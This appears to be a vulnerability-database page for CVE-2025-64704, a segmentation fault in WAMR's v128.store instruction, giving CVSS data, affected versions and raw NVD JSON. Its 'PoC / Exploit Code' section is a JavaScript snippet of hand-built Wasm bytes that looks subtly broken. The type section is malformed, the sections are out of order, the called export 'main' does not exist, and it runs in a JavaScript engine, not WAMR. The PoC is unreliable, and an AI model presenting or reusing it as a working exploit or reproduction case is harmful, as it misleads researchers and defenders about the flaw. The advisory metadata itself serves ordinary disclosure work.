Security Vulnerability Report
CVE-2025-64704 CVSS 4.7 MEDIUM

CVE-2025-64704

Published: 2025-11-25 23:15:48
Last Modified: 2025-12-03 18:50:21

Description

WebAssembly Micro Runtime (WAMR) is a lightweight standalone WebAssembly (Wasm) runtime. Prior to version 2.4.4, WAMR is susceptible to a segmentation fault in the v128.store instruction. This issue has been patched in version 2.4.4.

CVSS Details

CVSS Score: 4.7
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:bytecodealliance:webassembly_micro_runtime:*:*:*:*:*:*:*:* - VULNERABLE
WAMR < 2.4.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
(function() {
  // CVE-2025-64704 PoC - WAMR v128.store Segmentation Fault
  // This PoC demonstrates the v128.store instruction vulnerability in WAMR < 2.4.4
  const wasmCode = new Uint8Array([
    // Wasm Magic Number and Version
    0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00,
    // Type Section
    0x01, 0x07, 0x01, 0x06, 0x01, 0x01, 0x60, 0x00, 0x01, 0x01,
    // Function Section
    0x03, 0x02, 0x01, 0x00,
    // Memory Section
    0x05, 0x03, 0x01, 0x00, 0x01,
    // Data Section (malformed data to trigger v128.store issue)
    0x0b, 0x09, 0x01, 0x00, 0x41, 0x00, 0x0b, 0x01, 0x00,
    // Code Section
    0x0a, 0x0f, 0x01, 0x0d, 0x00, 0x41, 0x00, 0x41, 0x00, 0xfd, 0x52, 0x0b // v128.store instruction (0xfd 0x52)
  ]);

  // Create WebAssembly module from PoC code
  const module = new WebAssembly.Module(wasmCode);
  const instance = new WebAssembly.Instance(module);

  // Attempt to trigger the vulnerability
  try {
    instance.exports.main();
  } catch (e) {
    console.log('Potential crash or error detected:', e.message);
  }
})();

// Note: This PoC is for educational purposes only.
// Target: WAMR versions < 2.4.4
// Attack Vector: Local execution of malicious Wasm module
// Impact: Segmentation fault / DoS

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64704", "sourceIdentifier": "[email protected]", "published": "2025-11-25T23:15:47.583", "lastModified": "2025-12-03T18:50:20.670", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WebAssembly Micro Runtime (WAMR) is a lightweight standalone WebAssembly (Wasm) runtime. Prior to version 2.4.4, WAMR is susceptible to a segmentation fault in v128.store instruction. This issue has been patched in version 2.4.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-754"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:bytecodealliance:webassembly_micro_runtime:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.4.4", "matchCriteriaId": "FC2929DB-4D93-47DC-BA0C-10BAE8760C2B"}]}]}], "references": [{"url": "https://github.com/bytecodealliance/wasm-micro-runtime/releases/tag/WAMR-2.4.4", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/bytecodealliance/wasm-micro-runtime/security/advisories/GHSA-2f2p-wf5w-82qr", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/bytecodealliance/wasm-micro-runtime/security/advisories/GHSA-2f2p-wf5w-82qr", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}